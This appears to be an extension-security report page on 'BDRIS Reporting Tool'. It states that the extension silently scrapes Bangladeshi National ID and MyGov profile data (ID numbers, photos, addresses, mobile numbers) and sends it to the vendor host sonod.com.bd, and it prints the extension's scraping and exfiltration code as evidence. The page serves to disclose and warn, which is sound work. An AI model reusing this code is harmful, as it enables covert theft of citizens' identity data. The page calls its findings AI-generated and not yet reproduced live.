Is BDRIS Reporting Tool safe?
BDRIS Reporting Tool scrapes citizens' National ID and MyGov profile data and sends it to the vendor's own server unconditionally.
When you visit the Bangladesh National ID (NID) portal or the MyGov profile page, this extension's content script automatically reads your NID number, name, address, mobile number, and ID photo (or MyGov profile fields) directly from the page. It sends this data to the vendor's own backend at sonod.com.bd as soon as the page loads, without requiring a button click or showing any disclosure that the data is leaving your browser.
Who publishes itSeba Automation - 2 other listings from the same operator, 2 of them carrying a finding
Seba Automation - 2 other listings from the same operator, 2 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
2 other listings published from this account, 2k+ users between them. 2 of them carry a finding.
Shared hosts - 1 hostname
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
MyGov profile page auto-sends your mobile, name and photo to a vendor API
Code analysis shows that when your MyGov profile shows an NID-verified badge, the extension reads every profile form field plus your mobile, name and photo, then sends them to the developer's own server before you click anything.
You open your NID-verified profile page at idp-v2.live.mygov.bd/profile.
Code analysis shows the extension reads your profile form fields, mobile, name and photo, then sends them to the developer's own server.
The send is not wired to the button the extension also adds to the page.
| Field | Value | Why it matters | |
|---|---|---|---|
Mobile number | +8801712345678 (illustrative) | Your registered phone number on the MyGov identity portal. | |
Display name | Md. Karim Uddin (illustrative) | Your name as shown on your MyGov profile. | |
Profile photo URL | https://idp-v2.live.mygov.bd/media/photo_1029.jpg (illustrative) | A link to the photo shown on your MyGov profile. | |
Every profile form field | {"email":"karim@example.com","nid":"1994123456789012"} (illustrative) | Every input value under the profile form, captured wholesale by field name. |
Badge check triggers a form read and an unrequested POST
else if (currentURL == "https://idp-v2.live.mygov.bd/profile") {
var isNidVerified = false;
document.querySelectorAll('*').forEach(function (element) {
if (element.getAttribute('aria-label') && element.getAttribute('aria-label').indexOf('NID verified') !== -1) { isNidVerified = true; }
});
if (isNidVerified) {
var newButton = document.createElement('button');
newButton.textContent = 'সনদ সেবা';
var existingButton = document.querySelector('.btn.btn-success.w-100.mb-4');
existingButton.parentNode.insertBefore(newButton, existingButton.nextSibling);
var srcValue = document.querySelector('.profile-picture img').getAttribute('src');
var formData = {};
document.querySelectorAll('.profile-data input').forEach(function (input) {
formData[input.getAttribute('name')] = input.value;
});
formData.mobile = document.querySelector('.profile-mobile').textContent.trim();
formData.name_bn = document.querySelector('.profile-name').textContent.trim();
formData.photo = srcValue;
const requestData = { method: "POST", headers: { "Accept": "application/json" }, redirect: 'follow', body: JSON.stringify({ info: formData }) };
sebaAutomation.notifyAPI('https://sonod.com.bd/api/get/mygov', requestData).then(data => {});
}
}- sonod.com.bd
Receives the scraped MyGov profile from the content script. Registered to the same 'Seba Automation' vendor as the extension, not the MyGov government service.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
NID portal page load sends your ID number, photo and address to a vendor API
Code analysis shows opening your NID portal profile makes the extension read your National ID number, address and ID photo, then send them to the developer's own server on page load, no click needed.
You open your profile page on the government NID portal, services.nidw.gov.bd.
Code analysis shows the extension reads your ID number, address and photo, then sends them to the developer's own server.
The send happens as the page finishes loading, before you click anything on the page.
| Field | Value | Why it matters | |
|---|---|---|---|
National ID number | 1994123456789012 (illustrative) | Your unique Bangladesh national identity number. | |
ID photo | data:image/jpeg;base64,/9j/4AAQSkZJRg... (illustrative) | A base64-encoded copy of the photo on your national ID record. | |
Present address | House 12, Road 4, Dhanmondi, Dhaka (illustrative) | Your registered home address as shown on the government record. | |
Every profile field on the page | {"Date of Birth":"01 Jan 1994","Father Name":"Md. Karim"} (illustrative) | Every other label and value shown on your citizen profile tab, captured wholesale. |
Content script scrapes the profile, background script forwards it unmodified
else if (currentURL.includes("services.nidw.gov.bd/nid-pub/citizen-home")) {
let nid, photo, address_present;
const metaDiv = document.querySelector('.meta');
const descriptionDiv = document.querySelector('.description.universal-font-family18');
if (descriptionDiv) { address_present = descriptionDiv.textContent.trim(); }
if (metaDiv) {
const h5Element = metaDiv.querySelector('.profile-description-nid');
if (h5Element) { const text = h5Element.textContent.trim(); digits = text.match(/\d+/); nid = digits[0]; }
}
const imageElement = document.querySelector('div.ui.s-profile.card > div.image > img');
const imageUrl = imageElement.src;
fetch(imageUrl).then(response => response.blob()).then(blob => {
const reader = new FileReader();
reader.readAsDataURL(blob);
reader.onloadend = () => { photo = reader.result; };
});
sebaAutomation.submitRecord('https://services.nidw.gov.bd/nid-pub/citizen-home/profile/', {})
.then(html => {
const container = document.createElement('div');
container.innerHTML = html;
const targetDiv = container.querySelector('.ui.bottom.attached.non-bordered.non-padded.tab.segment.active');
const labelValues = {};
const labels = targetDiv.querySelectorAll('label');
labels.forEach(label => {
const labelText = label.innerText.trim();
const span = label.nextElementSibling;
if (span && span.tagName === 'SPAN') { labelValues[labelText] = span.innerText.trim(); }
});
labelValues.nid = nid;
labelValues.photo = photo;
labelValues.address_present = address_present;
let bodyContent = JSON.stringify({ info: labelValues });
chrome.runtime.sendMessage({ action: "nidwData", body: bodyContent }, function (response) {});
});
}else if (request.action === "nidwData") {
const headersData = {
method: 'POST',
headers: { "Accept": "application/json", "Content-Type": "application/json" },
body: request.body,
};
fetch('https://sonod.com.bd/api/get/nidw', headersData)
.then(response => response.json())
.then(data => { sendResponse({ data }); })
.catch(error => { sendResponse({ success: false, error: error.message }); });
return true;
}- sonod.com.bd
Receives the scraped National ID profile from the background worker. Registered to the same 'Seba Automation' vendor as the extension, not the Bangladesh NID government service.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
What it can do
Permissions this extension asks for, as declared in version 1.7.4.62. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Act on the current tab, but only after you click the extension
activeTab
Store data in your browser
storage
Show you desktop notifications
notifications
Schedule its own background tasks
alarms
Where it sends data
Destinations our analysis observed BDRIS Reporting Tool contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- sonod.com.bd
BDRIS Reporting Tool sends data to sonod.com.bd. No other extension we have analysed sends data here.